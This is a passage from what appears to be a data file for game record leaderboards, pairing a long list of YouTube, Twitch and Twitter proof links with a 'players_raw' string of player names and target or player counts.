https://www.youtube.com/watch?v=29LYgrs1eII https://www.youtube.com/watch?v=_juZKSyxql8 https://www.youtube.com/watch?v=yrId2C7fKh8 https://www.youtube.com/watch?v=5gPEyNGnWek https://www.youtube.com/watch?v=puogjWK5WfA N/A https://www.youtube.com/watch?v=ccpa4hs66OU https://www.youtube.com/watch?v=LqOBzY4EYgQ https://www.youtube.com/watch?v=pxJ50Nskl4s https://www.youtube.com/watch?v=OasN_u0LJmY https://www.youtube.com/watch?v=21Vws7YtID8 https://www.youtube.com/watch?v=yI4dxZlHJ1A https://www.youtube.com/watch?v=RRk5hVCAoJY https://www.youtube.com/watch?v=5RiFtW3xFdM https://www.youtube.com/watch?v=xxO6r62YJnk https://www.youtube.com/watch?v=2FjR67n9ysI https://www.youtube.com/watch?v=ECqul0Vlo1U N/A https://www.youtube.com/watch?v=NipcJuOwgKo https://www.youtube.com/watch?v=FmZKXjyMzio https://www.youtube.com/watch?v=1yq6HgRg0Bw https://www.youtube.com/watch?v=l9bnFpBXRhw https://www.youtube.com/watch?v=84O0J_uIHpk https://www.youtube.com/watch?v=PYaRrj8pcbY https://www.youtube.com/watch?v=3ioB6TJeKRY
https://www.youtube.com/watch?v=gPe3QAFAgOU https://www.youtube.com/watch?v=we9H0CyTp58 https://www.youtube.com/watch?v=c57m0czMHHI https://www.youtube.com/watch?v=d9CKW7jtI24 https://www.youtube.com/watch?v=q7OEwKuFs-E https://www.youtube.com/watch?v=p48NWkK2RPk https://www.youtube.com/watch?v=M9wV6pMKG_k https://www.youtube.com/watch?v=6uGEDxKbu1w https://www.youtube.com/watch?v=jl2qghtfnRo https://www.youtube.com/watch?v=MMB1YsKCfJw https://www.youtube.com/watch?v=vVfDpTKWwro https://www.youtube.com/watch?v=LO25pcSYCc0 https://www.youtube.com/watch?v=E3XWQrpcPYg https://www.youtube.com/watch?v=AJbafmGwraA https://www.youtube.com/watch?v=A66GKrSYjxM https://www.youtube.com/watch?v=imdLBefxYcs https://www.youtube.com/watch?v=XQeN18rv1mo https://www.youtube.com/watch?v=Bu73VOrFqz8 https://www.youtube.com/watch?v=v_MbEm6Nyqg https://www.youtube.com/watch?v=BKpI5VBlmSc N/A https://www.youtube.com/watch?v=HJ9iX6toMDo https://www.youtube.com/watch?v=HYWTFrTfNDw https://www.youtube.com/watch?v=IljCXdUUQRo https://www.youtube.com/watch?v=-YN1ZcMb0_U
N/A https://www.youtube.com/watch?v=TjogMhf8B7Y https://www.youtube.com/watch?v=bpqc3Zy157o https://www.youtube.com/watch?v=sTloshZcUbs https://www.youtube.com/watch?v=UCxyj944HqA https://www.youtube.com/watch?v=z3RhaMc7SdI https://www.youtube.com/watch?v=0ShqNSAnuBo https://www.youtube.com/watch?v=tcMIwUdiPhc https://www.youtube.com/watch?v=lFBiydeaIVM https://www.youtube.com/watch?v=Qpz7J44-QIs https://www.youtube.com/watch?v=r2mWJLJGTXg https://www.youtube.com/watch?v=xDHhIcZ3CNo https://www.youtube.com/watch?v=6Y2xHDsTczU https://www.youtube.com/watch?v=wuQU5wNWIsE https://www.youtube.com/watch?v=KXJ8w0LVP00 https://www.youtube.com/watch?v=t8YwyDxr2DQ https://www.youtube.com/watch?v=6MxkFFVV5aQ N/A https://www.youtube.com/watch?v=WIwihIUAWG0 https://www.youtube.com/watch?v=0ow8SvCRbdQ N/A https://www.youtube.com/watch?v=Y0pmJWZiIio https://www.youtube.com/watch?v=iKeyT_zLzxc https://www.youtube.com/watch?v=ZpzPxFPTFZE https://www.youtube.com/watch?v=S4Yv0ZBDnl4
https://www.youtube.com/watch?v=zEP0HECDd8Q https://www.youtube.com/watch?v=DXtP1gZmxq4 https://www.youtube.com/watch?v=OxUKz642jUA https://www.youtube.com/watch?v=DQekC1MukdM https://www.youtube.com/watch?v=9IJ-prLWQEQ https://www.youtube.com/watch?v=9GNcToGckuY https://www.youtube.com/watch?v=EBl8LHB5-bw https://www.youtube.com/watch?v=3RjNcTqHTV8 https://www.youtube.com/watch?v=JWnrETRYK2c https://www.youtube.com/watch?v=zqTCZYpz_dI https://www.youtube.com/watch?v=0VQ2aBCQZ-Y https://www.youtube.com/watch?v=5zqwUrh2EgU https://clips.twitch.tv/CrackyCrazyCobraGivePLZ https://www.youtube.com/watch?v=1gmyZVrYlP4 https://www.youtube.com/watch?v=JWeoWYG5Yq4 https://www.youtube.com/watch?v=mKHcmBkIcQM https://www.youtube.com/watch?v=XkP2VcgSiYs N/A https://www.youtube.com/watch?v=_pAqKwF-1XU https://www.youtube.com/watch?v=DY6XPg9x964 https://www.youtube.com/watch?v=77CKIoZWeKE https://www.youtube.com/watch?v=b7iLcHOo3uo https://www.youtube.com/watch?v=YEvTu9cBi18 https://www.youtube.com/watch?v=vV_c9Gyg61g https://www.youtube.com/watch?v=cMj9-LjBPB4
https://www.youtube.com/watch?v=2Wegc81UTFk https://www.youtube.com/watch?v=2-4HZYlF2_g https://www.youtube.com/watch?v=7dab8S8bkEs https://www.youtube.com/watch?v=A3avQubJdgQ https://www.youtube.com/watch?v=fwlqP5DbowI https://www.youtube.com/watch?v=h8EqU_a3SNw https://www.youtube.com/watch?v=_Ig3c-gTrtk https://www.youtube.com/watch?v=pgJGw6NNcow https://www.youtube.com/watch?v=aa4hZGnlUTk https://www.youtube.com/watch?v=vpVr2gNSGyU https://www.youtube.com/watch?v=gh7vZBbvMlw https://www.youtube.com/watch?v=cxx9GWQn3sQ https://www.youtube.com/watch?v=O6C3JxrBWWY https://www.youtube.com/watch?v=RsBVzW3bsNM https://www.youtube.com/watch?v=svlAmr5nyFU https://www.youtube.com/watch?v=SHv4ipl2r4k https://www.youtube.com/watch?v=QsNHhlSaAP8 N/A https://clips.twitch.tv/CooperativeMoralLyrebirdCmonBruh https://www.youtube.com/watch?v=PvOkh9kXDds https://www.youtube.com/watch?v=YuZ8V4hCI_I https://www.youtube.com/watch?v=GEknDriZCms https://www.youtube.com/watch?v=0lf8NaZEl0E https://www.youtube.com/watch?v=UnMGCwXSQdk https://www.youtube.com/watch?v=xcn1vMKLieo
https://www.youtube.com/watch?v=RhqI18DyoqY https://www.youtube.com/watch?v=YvfVVCaXI1w https://www.youtube.com/watch?v=Yh92EyrD1-M https://www.youtube.com/watch?v=8IOg0q_0cEY https://www.youtube.com/watch?v=kFLJMFtqnOw https://www.youtube.com/watch?v=tOm6wf76hkE https://www.youtube.com/watch?v=SMpMr9AzOjE https://www.youtube.com/watch?v=22pnF1JC_Lo https://www.youtube.com/watch?v=rU1kgImEGtE https://www.youtube.com/watch?v=n4y4-v3rpRc https://www.youtube.com/watch?v=0RmEeVKLo0U https://www.youtube.com/watch?v=ztuOokjPXlU https://www.youtube.com/watch?v=UjW8HAhZZcY https://www.youtube.com/watch?v=lp-DLoiX024 https://www.youtube.com/watch?v=F8PUWk2-X5I https://www.youtube.com/watch?v=wulz27Bksfo https://www.youtube.com/watch?v=Izz9AmS-88Q N/A https://www.youtube.com/watch?v=OwY8SH45B7I https://www.youtube.com/watch?v=nZIFHR1FJ4g https://www.youtube.com/watch?v=5u8S5q-ix84 https://www.youtube.com/watch?v=9Ls4uQwfX1Y https://www.youtube.com/watch?v=BOLdP0hWvEI https://www.youtube.com/watch?v=UJNEmnMYmXA https://www.youtube.com/watch?v=XZW7yzoicm4
https://www.youtube.com/watch?v=-Ct-Xi2b14w https://www.youtube.com/watch?v=ctKXxjb_awQ https://www.youtube.com/watch?v=ZN9HUkflZ6I https://www.youtube.com/watch?v=tMadLl3Xpe8 https://www.youtube.com/watch?v=JVtDBXOWKL4 N/A https://www.youtube.com/watch?v=EXXwFRse3tQ https://www.youtube.com/watch?v=Ec5LZE2kL-c https://www.youtube.com/watch?v=9kvoI09NKOI https://www.youtube.com/watch?v=1c3rIB0ZfAs https://www.youtube.com/watch?v=MxWTUtKATL0 https://www.youtube.com/watch?v=3Fkuw2mA6lI https://www.youtube.com/watch?v=XADRvLewY8w https://www.youtube.com/watch?v=dCA1Wh5imWE https://www.youtube.com/watch?v=LWEjjCEsEj8 https://www.youtube.com/watch?v=ww6a_Jw-dVE https://www.youtube.com/watch?v=VDoQLTD78Fs N/A https://www.youtube.com/watch?v=HPskgrRWUGk https://www.youtube.com/watch?v=cd4fNwurqCM N/A https://www.youtube.com/watch?v=ZrclOzsYPr8 https://www.youtube.com/watch?v=9acuQxwxxlc https://www.youtube.com/watch?v=xafPVdA7wN8 https://www.youtube.com/watch?v=rbUEAHa_PY0
https://www.youtube.com/watch?v=sJf2e0BJqIY https://www.youtube.com/watch?v=rIvjDVWctFI https://www.youtube.com/watch?v=QyWupUT5H1A https://www.youtube.com/watch?v=whYaDZXh9Qc https://www.youtube.com/watch?v=nUzGH3TgtUo https://www.youtube.com/watch?v=tZElleImoOY https://www.youtube.com/watch?v=xrGXOwiXXxk https://www.youtube.com/watch?v=rkbWhYKl6wQ https://www.youtube.com/watch?v=kIIFc6d_NEg https://www.youtube.com/watch?v=tJwz2p2GYWU https://www.youtube.com/watch?v=Bs-zyl2E6do https://www.youtube.com/watch?v=0NE86xa2VLM https://www.youtube.com/watch?v=TOdeKol0snE https://www.youtube.com/watch?v=GDIrI8Jcnu0 https://www.youtube.com/watch?v=ImXY5Hfm8mc https://www.youtube.com/watch?v=S7RtyMvBcRU https://www.youtube.com/watch?v=ov2x6lM2Nns N/A https://www.youtube.com/watch?v=aAy3WUFIOo4 https://www.youtube.com/watch?v=4KNziOGkqGg https://www.youtube.com/watch?v=cCU3DJOTPgc https://www.youtube.com/watch?v=LYGWjPH5tcA https://www.youtube.com/watch?v=t6IvMVhK5o8 https://www.youtube.com/watch?v=sZxDppKHiZg https://www.youtube.com/watch?v=asGLc59Jzm4
https://www.youtube.com/watch?v=M39VDHDaFAw https://www.youtube.com/watch?v=mit9XGV6PX4 https://www.youtube.com/watch?v=AjkbNKlS6H4 https://www.youtube.com/watch?v=R7n0WLtpIfs https://www.youtube.com/watch?v=_FLsF1GCH_M https://www.youtube.com/watch?v=fZvLnu139cQ https://www.youtube.com/watch?v=xHk0yMvGbvk https://www.youtube.com/watch?v=s8UJBEnKBno https://www.youtube.com/watch?v=KTICHiuVY_c https://www.youtube.com/watch?v=8aHynqFIgAI https://www.youtube.com/watch?v=PhKvZeJ0bMI https://www.youtube.com/watch?v=rns2jmMqxxo https://www.youtube.com/watch?v=hktolVVO1rk https://www.youtube.com/watch?v=RNcTJBlr1ZQ https://www.youtube.com/watch?v=kFwSI7PMLNk https://www.youtube.com/watch?v=9cVSImadCYg https://www.youtube.com/watch?v=WMaFacJDITA https://www.youtube.com/watch?v=DcMSwOMkKhI https://www.youtube.com/watch?v=ujNYTQpxxD4 https://www.youtube.com/watch?v=WGEDJ7lkr4E https://www.youtube.com/watch?v=TKtVsr-vE6w https://www.youtube.com/watch?v=oISLO1QWrSE https://www.youtube.com/watch?v=PvrrTAIXA_A https://www.youtube.com/watch?v=ecOBvu-y8qw https://www.youtube.com/watch?v=53uF8JybCa0
https://www.youtube.com/watch?v=Yh5W9s_WA_g https://www.youtube.com/watch?v=dWErJI7Exzk https://www.youtube.com/watch?v=Rgnbh57gm-g https://youtu.be/Pk7IaR_CL4w?t=37 https://www.youtube.com/watch?v=PzgeIuQQutY https://youtu.be/Pk7IaR_CL4w?t=60 https://youtu.be/Pk7IaR_CL4w?t=71 https://www.youtube.com/watch?v=OjgLAWq4k4U https://www.youtube.com/watch?v=aOb4y8Oj-84 https://youtu.be/Pk7IaR_CL4w?t=101 https://youtu.be/Pk7IaR_CL4w?t=112 https://youtu.be/Pk7IaR_CL4w?t=125 https://youtu.be/Pk7IaR_CL4w?t=140 https://youtu.be/Pk7IaR_CL4w?t=154 https://youtu.be/Pk7IaR_CL4w?t=166 https://www.youtube.com/watch?v=Sp6ojv_c9ks https://youtu.be/Pk7IaR_CL4w?t=190 https://youtu.be/Pk7IaR_CL4w?t=200 https://youtu.be/Pk7IaR_CL4w?t=216 https://www.youtube.com/watch?v=6MQyBmscItM https://www.youtube.com/watch?v=2vljcuawHwo https://youtu.be/Pk7IaR_CL4w?t=263 https://youtu.be/Pk7IaR_CL4w?t=273 https://youtu.be/Pk7IaR_CL4w?t=279 https://youtu.be/Pk7IaR_CL4w?t=290
https://twitter.com/Savestate/status/1094284626699395072 https://twitter.com/Savestate/status/1002748314457202688 https://www.youtube.com/watch?v=E7plcp3-PNw https://twitter.com/Savestate/status/1138412737682391046 https://twitter.com/Savestate/status/989634698392502274 https://twitter.com/Savestate/status/988194536458457089 https://twitter.com/Savestate/status/1002763166563143681 https://twitter.com/Savestate/status/1133938083286704129 https://twitter.com/Savestate/status/1058932199704219648 https://twitter.com/Savestate/status/993645942376222720 https://twitter.com/Savestate/status/993255044651929600 https://twitter.com/Savestate/status/1134953164673826817 https://twitter.com/Savestate/status/1137900814176067584 https://twitter.com/Savestate/status/1010994055281561601 https://twitter.com/Savestate/status/1058821178415038468 https://twitter.com/Savestate/status/1051200393915588613 https://www.youtube.com/watch?v=2E0qyX5jM2I https://twitter.com/Savestate/status/984895162793984001 https://twitter.com/Savestate/status/1058803586568781824 https://twitter.com/Savestate/status/1164602932475637760 https://twitter.com/Savestate/status/1286090236389396480 https://twitter.com/Savestate/status/1286096592253132800 https://twitter.com/Savestate/status/1002729912409747456 https://twitter.com/Savestate/status/1137828392613683205 https://twitter.com/Savestate/status/1094228723098894336
https://www.youtube.com/watch?v=eGqaxmqMYbc https://www.youtube.com/watch?v=XM2btPzyOWo https://www.youtube.com/watch?v=oM9n9XnbTpo https://www.youtube.com/watch?v=JpWJ_4xlGjk https://www.youtube.com/watch?v=8n8O9LDXOVY https://www.youtube.com/watch?v=gDW25OFHVko https://www.youtube.com/watch?v=g_BCqFFU09w https://www.youtube.com/watch?v=W8HCuT6SjXg https://www.youtube.com/watch?v=gclXdjBTF-E https://www.youtube.com/watch?v=2fvQI1vVuCE https://www.youtube.com/watch?v=7UV-4IeoaNQ https://www.youtube.com/watch?v=5pFcHAE9Yrk https://www.youtube.com/watch?v=JjwtM9zh8SM https://www.youtube.com/watch?v=f-GPVeJqJio https://www.youtube.com/watch?v=68pelq7WrXk https://www.youtube.com/watch?v=S1gb9-SOVmo https://www.youtube.com/watch?v=6S0xOWU4NJM https://www.youtube.com/watch?v=TkwWcNeG-JE https://www.youtube.com/watch?v=bK0iLy_gmUs https://www.youtube.com/watch?v=CDAAZuewBf0 https://www.youtube.com/watch?v=FnPU2BuNJMk https://www.youtube.com/watch?v=9EOHBd8R88Q https://www.youtube.com/watch?v=aC8aqqPJiig https://www.youtube.com/watch?v=OWN5GKX-rU0 https://www.youtube.com/watch?v=ZqFskHNPkWE
https://www.youtube.com/watch?v=vJuQEOA4ZCw https://www.youtube.com/watch?v=zYIrQ7rz2Ww https://www.youtube.com/watch?v=DNjzDFMlHG0 https://www.youtube.com/watch?v=E4nm_F9NAss https://www.youtube.com/watch?v=H9jja6AjBaU https://www.youtube.com/watch?v=Bzds1HPYoUM https://www.youtube.com/watch?v=pxa7oClh5jE https://www.youtube.com/watch?v=e7LxK43JAAM https://www.youtube.com/watch?v=E1coxZq8ySQ https://www.youtube.com/watch?v=NWeRoQ9Wp08 https://www.youtube.com/watch?v=iLVfOYZyhnk https://www.youtube.com/watch?v=mlxYqgPKJXo https://www.youtube.com/watch?v=LHSrSsjLj1Q https://www.youtube.com/watch?v=JfJs7_yi0rw https://www.youtube.com/watch?v=UyWq5CZoxKk https://www.youtube.com/watch?v=h3XXph49xtk https://www.youtube.com/watch?v=MsKO5e4e5sM https://www.youtube.com/watch?v=8cKgbNQiFS4 https://www.youtube.com/watch?v=6j8mfKmw458 https://www.youtube.com/watch?v=MBCha68F1vo https://www.youtube.com/watch?v=5UauL1-1JP4 https://www.youtube.com/watch?v=xi1FqrfQSgA https://www.youtube.com/watch?v=bo44Y8Yowes https://www.youtube.com/watch?v=G27ZiUD65Ww https://www.youtube.com/watch?v=fpzTT0j6Vvg
https://www.youtube.com/watch?v=CD9jeevIUzo https://www.youtube.com/watch?v=Np4yexcsRzk https://www.youtube.com/watch?v=eHojMTKx2go https://www.youtube.com/watch?v=XkL2SfPQxjQ https://www.youtube.com/watch?v=vVTW9xgjL6s https://www.youtube.com/watch?v=IuilSUTO3M8 https://www.youtube.com/watch?v=1hgMonUJCb8 https://www.youtube.com/watch?v=l2wnfPKkQ94 https://www.youtube.com/watch?v=_HqcAQewCVU https://www.youtube.com/watch?v=FZ8LB8bJxfw https://www.youtube.com/watch?v=Mynn-YG1kGs https://www.youtube.com/watch?v=2zv79PiKIqE https://www.youtube.com/watch?v=oOooLGmhygY https://www.youtube.com/watch?v=8G7UPqql-as https://www.youtube.com/watch?v=VUGmdNbW1zo https://www.youtube.com/watch?v=H8pV-X3m0Xw https://www.youtube.com/watch?v=fkokgKyIbYM N/A https://www.youtube.com/watch?v=iOU1Zpb8K7Q https://www.youtube.com/watch?v=qqwHdsg2FJY https://www.youtube.com/watch?v=khqP5qGMWQc https://www.youtube.com/watch?v=UTZKUcgrLiE https://www.youtube.com/watch?v=x07gKSrGKm0 https://www.youtube.com/watch?v=0lU5-olJgNY https://www.youtube.com/watch?v=tbLLkwQCkTU
https://www.youtube.com/watch?v=yNjgOfGi20U https://www.youtube.com/watch?v=oSixB9YopwA https://www.youtube.com/watch?v=8G2WtqAMKFQ https://www.youtube.com/watch?v=eKrhC9mmHP0 https://www.youtube.com/watch?v=oWBAH89ptGs https://www.youtube.com/watch?v=CGjPiUiAO1g https://www.youtube.com/watch?v=yW_SeNWLFYM https://www.youtube.com/watch?v=3osknFn0rWo https://www.youtube.com/watch?v=RdRYs64U5tA https://www.youtube.com/watch?v=UnIv_vUBvy8 https://www.youtube.com/watch?v=iqVr5WkmSC4 https://www.youtube.com/watch?v=JbxReYGXx7Y https://www.youtube.com/watch?v=DSEd0AdHTFQ https://www.youtube.com/watch?v=qXfx3ig8EDc https://www.youtube.com/watch?v=pnn43ulBk1c https://www.youtube.com/watch?v=98hzRBepckU https://www.youtube.com/watch?v=Fu-WS17i0BI https://www.youtube.com/watch?v=Go2x0KJWU9Q https://www.youtube.com/watch?v=xyPw6dACBzE https://www.youtube.com/watch?v=RAiS_MAtuis https://www.youtube.com/watch?v=YOdUF7zPpDg https://www.youtube.com/watch?v=GhWShmgkpS0 https://www.youtube.com/watch?v=fKSJbwUwUz4 https://www.youtube.com/watch?v=N10-xMZfgW0 https://www.youtube.com/watch?v=2NSl__4Fo3A
https://www.youtube.com/watch?v=i-aAbeS2_b8 https://www.youtube.com/watch?v=KDzMPg_B2uE https://www.youtube.com/watch?v=eJyxBm6Kj6Q https://www.youtube.com/watch?v=gsTNadm8kHM https://www.youtube.com/watch?v=6ewdi4xBWtU https://www.youtube.com/watch?v=tPUqzy9fsX0 https://www.youtube.com/watch?v=MuV30khGg7c https://www.youtube.com/watch?v=_-4wI0Ewv5M https://www.youtube.com/watch?v=XTv5HcRwEpE https://www.youtube.com/watch?v=z5NmNzw-leM https://www.youtube.com/watch?v=LQHJoMA0gow https://www.youtube.com/watch?v=TSbjTC63Sck https://www.youtube.com/watch?v=MIoXf4Q89q0 https://www.youtube.com/watch?v=7AFM5JeHwbM https://www.youtube.com/watch?v=wRXDaquNDeQ https://www.youtube.com/watch?v=vY4WPZ_mSYo https://www.youtube.com/watch?v=xVisfqT8G2k https://www.youtube.com/watch?v=-JB3JOfchCM https://www.youtube.com/watch?v=Lj9LM1jfGs0 https://www.youtube.com/watch?v=Mg5OY2H_m1E https://www.youtube.com/watch?v=SvXvUYVMh_o https://www.youtube.com/watch?v=CcnuWgtPEsQ https://www.youtube.com/watch?v=ZfqzU-GVUSk https://www.youtube.com/watch?v=Ed9aORUlJtY https://www.youtube.com/watch?v=LD6iiU_xuPQ
https://www.youtube.com/watch?v=VXUfhi5lF6U https://www.youtube.com/watch?v=6cQsIrl72jY https://www.youtube.com/watch?v=UL_cX38sAVE https://www.youtube.com/watch?v=DvuHCyPn9dI https://www.youtube.com/watch?v=GOzd_CklSLg https://www.youtube.com/watch?v=2-bmAgak6-M https://www.youtube.com/watch?v=FT0IxNW9ZBU https://www.youtube.com/watch?v=qHUw7IaOOn0 https://www.youtube.com/watch?v=zcPmF01TqDc https://www.youtube.com/watch?v=gS4-XtlVDMU https://www.youtube.com/watch?v=S8IbOgv4gvY https://www.youtube.com/watch?v=S5B6SHNXYuE https://www.youtube.com/watch?v=X1J_OkRu0H8 https://www.youtube.com/watch?v=NDhftPAy4uU https://www.youtube.com/watch?v=CwXXIzF8xfY https://www.youtube.com/watch?v=c-f_2kr4K9E https://www.youtube.com/watch?v=RC1Ui0tVsJA N/A https://www.youtube.com/watch?v=b7CPkx8vvvY https://www.youtube.com/watch?v=vDD06sevb8g N/A https://www.youtube.com/watch?v=rARIL5EQQ1U https://www.youtube.com/watch?v=3gfI4qciaQE https://www.youtube.com/watch?v=zgfJ8QKdIzI https://www.youtube.com/watch?v=za41VZDU9JA
https://www.youtube.com/watch?v=nr4MlWjyps8 https://www.youtube.com/watch?v=9cEhRffvgD8 https://www.youtube.com/watch?v=uERFNYxn0Bg https://www.youtube.com/watch?v=_3_oJSopLHg https://www.youtube.com/watch?v=y7ZGCFKDMVY https://www.youtube.com/watch?v=oWPwudL2zx4 https://www.youtube.com/watch?v=Qn2kDwlb4_M https://youtu.be/nr4MlWjyps8?t=91 https://www.youtube.com/watch?v=9Xmkl6LXUvg https://youtu.be/nr4MlWjyps8?t=110 https://youtu.be/nr4MlWjyps8?t=120 https://www.youtube.com/watch?v=mBI_5g29-LA https://www.youtube.com/watch?v=xdyhCZKgA5Q https://youtu.be/nr4MlWjyps8?t=166 https://youtu.be/nr4MlWjyps8?t=180 https://www.youtube.com/watch?v=1QCn7WqWZEc https://www.youtube.com/watch?v=_2gpZfQ-s0s N/A https://www.youtube.com/watch?v=w-6b5Cg06X4 https://youtu.be/nr4MlWjyps8?t=226 https://www.youtube.com/watch?v=JANL917rnzI https://www.youtube.com/watch?v=kalcluHqFM0 https://youtu.be/nr4MlWjyps8?t=265 https://www.youtube.com/watch?v=IQ3-IO8LI1I https://www.youtube.com/watch?v=zyimiMrj1mU
https://www.youtube.com/watch?v=8r0T4CCnQMI https://www.youtube.com/watch?v=mFLGo4tJMNY https://www.youtube.com/watch?v=Ex9U1SYiRYk https://www.youtube.com/watch?v=XDLWTmuSQTs https://www.youtube.com/watch?v=OG6Dzlq_2ms https://www.youtube.com/watch?v=ccu5bF7i_Tk https://www.youtube.com/watch?v=7udIr_VZ4ss https://www.youtube.com/watch?v=QsPhqon9Mz4 https://www.youtube.com/watch?v=0JQH4MeKw0U https://www.youtube.com/watch?v=3NexizuoWMc https://www.youtube.com/watch?v=gyEHpOL8S1k https://www.youtube.com/watch?v=jE7MbTCAoNw https://www.youtube.com/watch?v=R4z4Kv47m3E https://www.youtube.com/watch?v=DzSgZXABsvE https://www.youtube.com/watch?v=5pUM25TJZOs https://www.youtube.com/watch?v=DDT85MOsN-0 https://www.youtube.com/watch?v=80n8Fcc_ab4 N/A https://www.youtube.com/watch?v=v_QItrMOidg https://www.youtube.com/watch?v=wM6bWK1ao3g N/A https://www.youtube.com/watch?v=4XTUaYZZwDc https://www.youtube.com/watch?v=1vv2-mmUCJU https://www.youtube.com/watch?v=PAPA5Loj8FQ https://www.youtube.com/watch?v=Z6pcPJcF0NU"""
players_raw = """mudi Samplay Samplay Hawk Samplay Samplay jenkem66 Samplay 2 people Samplay Samplay Hawk Hawk sockdude1 Samplay Hawk Samplay 1 target Samplay Samplay 9 targets Samplay Hawk Samplay Samplay
Jerry3333 LinksDarkArrows Samplay jenkem66 sockdude1 sockdude1 sockdude1 Jerry3333 2 people sockdude1 Jerry3333 Jerry3333 sockdude1 Jerry3333 sockdude1 Jerry3333 sockdude1 Samplay Samplay Samplay Samplay Samplay Jerry3333 sockdude1 Samplay
Samplay Jerry3333 2 people Samplay Samplay Samplay Samplay Samplay Hawk Samplay Samplay Samplay Samplay sockdude1 djwang88 Samplay Samplay 1 target Samplay sockdude1 1221 Samplay Samplay Samplay Samplay
Jerry3333 Jerry3333 Samplay samthedigital Jerry3333 9 targets sockdude1 Jerry3333 Jerry3333 sockdude1 sockdude1 sockdude1 sockdude1 sockdude1 Jerry3333 sockdude1 sockdude1 1 target sockdude1 Jerry3333 8 targets Jerry3333 Jerry3333 sockdude1 Samplay
Bobby Bobby Samplay Bobby sockdude1 sockdude1 Bobby Bobby jenkem66 Bobby Bobby Bobby Bobby sockdude1 Samplay Samplay Bobby sockdude1 Bobby Bobby Bobby Bobby Bobby Bobby Bobby
Samplay Samplay Samplay sockdude1 sockdude1 3 people sockdude1 sockdude1 sockdude1 Samplay sockdude1 Samplay sockdude1 sockdude1 sockdude1 djwang88 Samplay 1 target Samplay sockdude1 9 targets Samplay sockdude1 sockdude1 sockdude1
pokefantom sockdude1 Samplay jenkem66 sockdude1 9 targets sockdude1 Jerry3333 pokefantom sockdude1 sockdude1 Samplay mimorox sockdude1 Samplay Samplay Samplay 1 target pokefantom jenkem66 Samplay Samplay jenkem66 sockdude1 pokefantom
sockdude1 sockdude1 Samplay jenkem66 sockdude1 Samplay Bobby samthedigital mudi sockdude1 sockdude1 sockdude1 sockdude1 jenkem66 mudi sockdude1 jenkem66 jenkem66 sockdude1 sockdude1 9 targets Samplay sockdude1 sockdude1 sockdude1
9 targets mimorox Samplay Bobby sockdude1 jenkem66 sockdude1 megaqwertification 10 people Bobby sockdude1 sockdude1 mimorox sockdude1 megaqwertification megaqwertification sockdude1 0 targets mimorox megaqwertification 8 targets djwang88 Samplay djwang88 djwang88
Samplay Samplay Samplay Samplay Samplay Samplay Samplay Samplay Samplay 8 people Samplay jenkem66 jenkem66 Samplay Samplay Samplay Samplay 9 targets Samplay Samplay Samplay Samplay Samplay Samplay sockdude1
jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 2 people jenkem66 mudi jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 9 targets jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 jenkem66 jenkem66
sockdude1 Jerry3333 Samplay megaqwertification megaqwertification megaqwertification 1221 sockdude1 megaqwertification Hawk sockdude1 sockdude1 sockdude1 1221 sockdude1 pokefantom sockdude1 6 targets 1221 sockdude1 Samplay Samplay megaqwertification sockdude1 pokefantom
Samplay sockdude1 Samplay sockdude1 sockdude1 9 targets sockdude1 sockdude1 sockdude1 Samplay sockdude1 sockdude1 samthedigital sockdude1 sockdude1 sockdude1 sockdude1 1 target sockdude1 sockdude1 8 targets sockdude1 sockdude1 sockdude1 sockdude1
Jerry3333 Jerry3333 Samplay Jerry3333 Jerry3333 Jerry3333 Jerry3333 Samplay Jerry3333 Samplay Jerry3333 Jerry3333 mimorox samthedigital Jerry3333 Jerry3333 Jerry3333 1 target mimorox sockdude1 Jerry3333 Jerry3333 LinksDarkArrows djwang88 Jerry3333
Samplay Bobby Samplay Bobby Bobby Bobby Bobby Bobby Bobby Samplay Bobby Bobby Bobby Bobby Mario 64 Master Bobby Bobby Samplay Samplay Bobby Bobby Bobby Bobby Bobby Bobby
Jerry3333 Samplay Samplay Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Jerry3333 sockdude1 Jerry3333 Jerry3333 Jerry3333 sockdude1 sockdude1 Jerry3333 Jerry3333 Jerry3333 Jerry3333
Savestate Savestate Samplay Savestate Savestate Savestate Savestate Savestate Savestate Savestate Savestate Savestate Savestate Savestate Savestate Savestate samthedigital Savestate Savestate Savestate Savestate Savestate Savestate Savestate Savestate
Samplay megaqwertification Samplay Jerry3333 Samplay Samplay megaqwertification megaqwertification LinksDarkArrows megaqwertification Samplay Samplay megaqwertification Samplay LinksDarkArrows 2 people Samplay megaqwertification 2 people Samplay Samplay LinksDarkArrows sockdude1 Samplay Samplay
megaqwertification pokefantom Samplay Judge9 pokefantom LinksDarkArrows megaqwertification pokefantom sockdude1 pokefantom pokefantom Samplay mimorox sockdude1 sockdude1 pokefantom megaqwertification Samplay sockdude1 Samplay Samplay pokefantom Samplay sockdude1 pokefantom
Samplay Samplay Samplay Samplay Samplay megaqwertification Samplay Samplay LinksDarkArrows Samplay Samplay Samplay Samplay LinksDarkArrows Samplay jenkem66 jenkem66 1 target sockdude1 sockdude1 Samplay Samplay LinksDarkArrows Samplay jenkem66
Judge9 Judge9 Samplay Judge9 Judge9 Judge9 Judge9 Judge9 Samplay Samplay Judge9 Judge9 Judge9 sockdude1 djwang88 megaqwertification megaqwertification Samplay Judge9 Judge9 mudi Samplay 1221 Judge9 1221
Samplay Samplay Samplay Samplay jenkem66 Samplay Bobby Samplay 2 people Samplay Samplay Bobby mimorox Samplay sockdude1 jenkem66 jenkem66 Samplay jenkem66 Samplay Samplay 3 people jenkem66 Bobby 1221
Jerry3333 Jerry3333 Samplay Samplay Jerry3333 sockdude1 sockdude1 Jerry3333 megaqwertification Samplay sockdude1 Jerry3333 Hawk Jerry3333 Jerry3333 Hawk Jerry3333 1 target Jerry3333 megaqwertification 9 targets pokefantom 4 people Jerry3333 pokefantom
Jerry3333 sockdude1 Samplay Hawk Hawk jenkem66 jenkem66 Jerry3333 Jerry3333 Jerry3333 Jerry3333 Hawk djwang88 Jerry3333 Jerry3333 djwang88 jenkem66 1 target Samplay Jerry3333 Jerry3333 Samplay Jerry3333 sockdude1 Hawk
djwang88 sockdude1 Samplay Samplay sockdude1 djwang88 djwang88 djwang88 2 people djwang88 djwang88 djwang88 djwang88 djwang88 djwang88 sockdude1 djwang88 1 target sockdude1 djwang88 9 targets 2 people LinksDarkArrows djwang88 samthedigital"""
